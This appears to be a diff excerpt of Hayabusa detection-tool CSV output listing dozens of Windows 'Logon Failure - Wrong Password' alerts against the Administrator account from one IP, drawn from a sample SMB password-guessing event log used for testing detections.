+2016-09-20 01:50:42.901 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: KUCoisntgbX7Mnis  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:42.952 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: MFN0b769jRyDxyAW  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:42.993 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: HKr2OCyezvSEsHBZ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:43.034 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: QN3snXM4mwhauvvF  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:43.163 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: J1VpvQgnwXVxRY1u  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:43.233 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: p5bsnUZjpHrbD6kN  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:43.286 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: hpL2QnQ0kKqU40a6  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:43.369 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: rpkpNfeTsOeXEsJ0  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:43.400 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 5mBhuTFm02IjipEw  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:43.443 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: yZ908ZOCkSBC7tms  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:43.487 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 8l7Bct5nMTZHd5mK  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:43.522 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: lRk6e7SrInMDsdMV  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:43.560 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: MhGByctTcM7NXGtB  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:43.604 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: BgzhW3Pd5JAB8j4f  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:43.643 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: GZOm1J5kdItrQpGL  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:43.680 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: DK77Hylw8CJHVGvb  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:43.720 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: pf7DQVQY7AowT8NY  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:43.762 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 4us3HR9jseQWIHt8  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:43.805 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: vhJRmgooz8CXjB6E  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:43.848 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: LkjIXxAvEDrPFUpZ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:43.889 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ENc8aqouBangyUrU  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:43.932 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 7flMdluc8YRhOuzn  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:43.971 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 8WFqeMJIXGDjDP0a  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:44.015 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: iKeRDzfuDCJSv4Wh  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:44.058 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: gNEYkgBoG8rAE6SP  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:44.090 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: vyy1aBvh6lJBs5M5  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:44.146 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: oyhiWNroUS5X5AEh  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:44.184 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: xg9rUUIwEfujwCvq  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:44.232 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: zfvpeyTKc3YYkVkw  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:44.302 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: VJGR6CYKLUJp2fWl  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:44.361 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: cmSap0AJZq0KMRBV  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:44.429 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: XnVCbq1IYZF19oYR  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:44.485 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: aVaDMa2uNXTZNcBj  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:44.538 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ymf6Fhv5ieWwcq73  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:44.584 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: CT6YMlX1GqeEuAHl  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:44.625 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: FDJ1IFpMNQ2Euhyn  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:44.672 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: EGTzqnHJIiZdSgNk  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:44.732 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: epSckAKbAp8qag89  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:44.788 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: NNC8ilAuznKPwFvV  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:44.834 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: wObt647cIBPiVaZi  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:44.873 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: nYDe1L7NNxDGQ0Vt  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:44.927 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: mXroClxv7B0aCTYv  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:44.973 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: kCVah2QOH1hMSV76  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:45.020 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 2HjD65Xy4Hppim2l  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:45.065 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: xwmEQxC4iTcF4aFu  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:45.114 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: q3QxOH7ok8RR068t  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:45.164 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: dJFj6Ckw1HdK9w52  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:45.209 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Qqu3Im4HXQNyGnYm  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:45.248 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: bk5dmjQDnpSlREum  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:45.279 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Pk4BvYgXBR2whf80  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:45.327 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: i6n1su2TUr7ONQr4  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:45.368 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: givsEAGfG0smN9Re  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:45.418 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: i2YuM0i7a2QuY7xb  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:45.470 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: xuocQPZpd91adY0E  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:45.541 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: PvGB1dZrfDWyZoqs  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:45.588 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: w4oi8iL88rJo7g2Q  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:45.676 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: cF3OUnytXi4NjvqB  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:45.725 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: WKkJcp3TYj31iJUM  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:45.760 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: G0E44RVqAE1feU0b  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:45.796 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Ny5LCb1qOIUhxOPY  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:45.840 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 9jcDgzzqH26DjQ1k  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:45.885 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: yil94cFkU6UP24SK  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:45.927 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: bkdVHF3vggCcuNdn  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:45.964 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 4dRRI2CS3aVIX4nX  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:46.004 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: chDZq3VgxIE2mRb9  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:46.046 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: HLVvgMmqLXKZADON  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:46.080 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: i4avO2AJSlNb0IUL  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:46.128 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Mdo5CvycGvGhn33y  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:46.171 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: heJfjLl1vbX6lMjZ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:46.209 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: wOP1E6hd4Jtj4gob  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:46.248 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Xa7kMCNz0bEGTBqX  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:46.293 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: HSxTQ4HsZt2DeYVe  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
